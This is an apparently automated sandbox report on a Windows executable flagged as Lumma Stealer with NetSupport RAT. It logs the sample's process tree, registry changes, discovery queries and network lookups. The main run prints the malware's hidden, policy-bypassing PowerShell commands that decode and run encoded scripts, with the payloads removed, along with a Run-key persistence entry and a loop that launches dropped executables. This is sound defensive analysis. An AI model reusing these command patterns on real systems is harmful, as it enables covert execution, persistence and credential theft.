Malware Analysis Report

2024-10-19 01:37

Sample ID 241007-cl9kmazanr
Target f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
SHA256 f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266
Tags
discovery netsupport execution persistence rat lumma stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files, in report order: behavioral21, behavioral32, behavioral2, behavioral16, behavioral22, behavioral23, behavioral27, behavioral11, behavioral19, behavioral6, behavioral13, behavioral1, behavioral5, behavioral26, behavioral28, behavioral29, behavioral12, behavioral25, behavioral14, behavioral15, behavioral17, behavioral20, behavioral30, behavioral31, behavioral3, behavioral4, behavioral18, behavioral7, behavioral9, behavioral10, behavioral24, behavioral8

Analysis Overview

score
10/10

SHA256

f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266

Threat Level: Known bad

The file f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe was found to be: Known bad.

Malicious Activity Summary

discovery netsupport execution persistence rat lumma stealer

Lumma Stealer, LummaC

NetSupport

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies registry class

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-07 02:12

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A (3 identical events)

Analysis: behavioral21

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2120 wrote to memory of 2180 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe (7 identical events)

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

126s

Max time network

160s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3560 wrote to memory of 1756 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe (3 identical events)

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1756 -ip 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4500,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4512 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

122s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

Signatures

NetSupport

rat netsupport

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A (15 identical events)
N/A N/A C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe N/A (2 identical events)
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A (2 identical events)
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A (5 identical events)

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3320 set thread context of 3112 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A (2 identical events)
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A (4 identical events)
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A (20 identical events)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
The 21 rows above are recorded three times in succession, followed by one further "Token: SeIncreaseQuotaPrivilege" row for the same WMIC.exe process (64 rows in total).

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\TempControll\client32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 916 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe (3 identical events)
PID 684 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe (3 identical events)
PID 3616 wrote to memory of 744 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)
PID 744 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com (3 identical events)
PID 744 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe (2 identical events)
PID 3616 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)
PID 3376 wrote to memory of 4216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com (3 identical events)
PID 3376 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe (3 identical events)
PID 3376 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com (3 identical events)
PID 3616 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)
PID 1532 wrote to memory of 4904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com (3 identical events)
PID 1532 wrote to memory of 2216 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe (3 identical events)
PID 1532 wrote to memory of 2808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com (3 identical events)
PID 3616 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)
PID 1452 wrote to memory of 4996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com (3 identical events)
PID 1452 wrote to memory of 1712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\wbem\WMIC.exe (3 identical events)
PID 1452 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\more.com (3 identical events)
PID 3616 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)
PID 4900 wrote to memory of 3508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com (3 identical events)
PID 4900 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\reg.exe (2 identical events)
PID 3616 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (3 identical events)
PID 3616 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe C:\Windows\SysWOW64\cmd.exe (3 identical events)

Processes

C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 866

C:\Windows\SysWOW64\wbem\WMIC.exe

C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List

C:\Windows\SysWOW64\more.com

C:\Windows\System32\more.com

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""

C:\Windows\SysWOW64\chcp.com

C:\Windows\System32\chcp.com 65001

C:\Windows\system32\reg.exe

C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[base64-encoded payload removed]')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/fe4cb4db9fe2a79024e9e07150b10e2f/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec [encoded command removed]

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EE688E235AC8F138C0204F099AFD0F6 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DD47AE7F6A97798668302640F90AD693 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DD47AE7F6A97798668302640F90AD693 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

